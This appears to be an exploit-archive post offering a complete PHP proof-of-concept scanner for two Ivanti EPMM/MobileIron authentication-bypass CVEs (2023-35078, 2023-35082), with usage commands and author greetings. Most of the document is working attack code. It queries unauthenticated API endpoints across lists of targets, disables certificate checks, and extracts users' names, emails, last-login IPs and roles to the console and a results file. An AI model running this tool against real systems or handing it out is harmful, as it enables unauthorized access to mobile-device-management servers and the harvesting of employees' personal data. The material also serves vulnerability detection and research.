Ivanti 11.10 MobileIron Vulnerability Scanner

Ivanti 11.10 MobileIron Vulnerability Scanner

=============================================================================================================================================
| # Title Ivanti 11.10 MobileIron Vulnerability Scanner

=============================================================================================================================================
| # Title : Ivanti 11.10 MobileIron Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://help.ivanti.com/iv/help/en_US/RS/vNow/Version-11-10-00-Release-Notes.htm |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213672/ & CVE-2023-35078, CVE-2023-35082

[+] Summary : This PHP-based scanner detects unauthenticated access vulnerabilities in Ivanti EPMM / MobileIron products. The issue allows attackers to
retrieve sensitive user information via exposed API endpoints.

[+] PoC : php poc.php -u https://target.com -v

-f targets.txt -o result.txt

<?php

ini_set("display_errors", 0);
error_reporting(0);

$vulnerabilities = [
"mifs/asfV3" => "CVE-2023-35082",
"mifs/aad" => "CVE-2023-35078"
];

$timeout = 5;
$userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";

function fetchData($baseUrl, $path, $timeout, $userAgent) {
$url = rtrim($baseUrl, "/") . "/$path/api/v2/authorized/users?adminDeviceSpaceId=1";

$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => $timeout,
CURLOPT_HTTPHEADER => [
"User-Agent: $userAgent",
"Accept: application/json"
]
]);

$response = curl_exec($ch);
curl_close($ch);

if (!$response) {
return null;
}

$json = json_decode($response, true);
return is_array($json) ? $json : null;
}

function processUrl($baseUrl, $verbose = false, $outputFile = null) {
global $vulnerabilities, $timeout, $userAgent;

$parsed = parse_url($baseUrl);
$scheme = $parsed["scheme"] ?? "http";
$host = $parsed["host"];
$port = $parsed["port"] ?? ($scheme === "https" ? 443 : 80);

$foundCVEs = [];
$validData = null;
$validUrl = null;

foreach ($vulnerabilities as $path => $cve) {

$tests = ($cve === "CVE-2023-35082")
? [[$port, $scheme], [8080, "http"], [8080, "https"]]
: [[$port, $scheme]];

foreach ($tests as [$p, $s]) {
$url = "$s://$host:$p";

if ($verbose) {
echo "[*] Testing $url/$path\n";
}

$data = fetchData($url, $path, $timeout, $userAgent);
if ($data) {
$foundCVEs[] = $cve;
$validData = $data;
$validUrl = $url;
}
}
}

if ($validData) {
processData($validUrl, array_unique($foundCVEs), $validData, $verbose, $outputFile);
}
}

function processData($baseUrl, $cves, $data, $verbose, $outputFile) {
echo "[!] $baseUrl MAY BE VULNERABLE TO: " . implode(", ", $cves) . "\n";

$results = $data["results"] ?? $data["result"] ?? [];
$emails = [];

foreach ($results as $user) {
$email = $user["email"] ?? null;
if ($email) {
$emails[] = $email;

if ($verbose) {
echo "Name : {$user['displayName']}\n";
echo "Email: $email\n";
echo "IP : {$user['lastLoginIp']}\n";
echo "Roles: " . implode(", ", $user["roles"]) . "\n";
echo str_repeat("-", 40) . "\n";
}
}
}

$emails = array_unique($emails);

if ($outputFile) {
file_put_contents(
$outputFile,
"$baseUrl [" . implode(",", $cves) . "] " . implode(",", array_slice($emails, 0, 5)) . PHP_EOL,
FILE_APPEND
);
}
}

$options = getopt("u:f:o:v");

if (isset($options["u"])) {
processUrl($options["u"], isset($options["v"]), $options["o"] ?? null);
}

if (isset($options["f"])) {
$urls = file($options["f"], FILE_IGNORE_NEW_LINES);
foreach ($urls as $url) {
processUrl(trim($url), isset($options["v"]), $options["o"] ?? null);
}
}



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================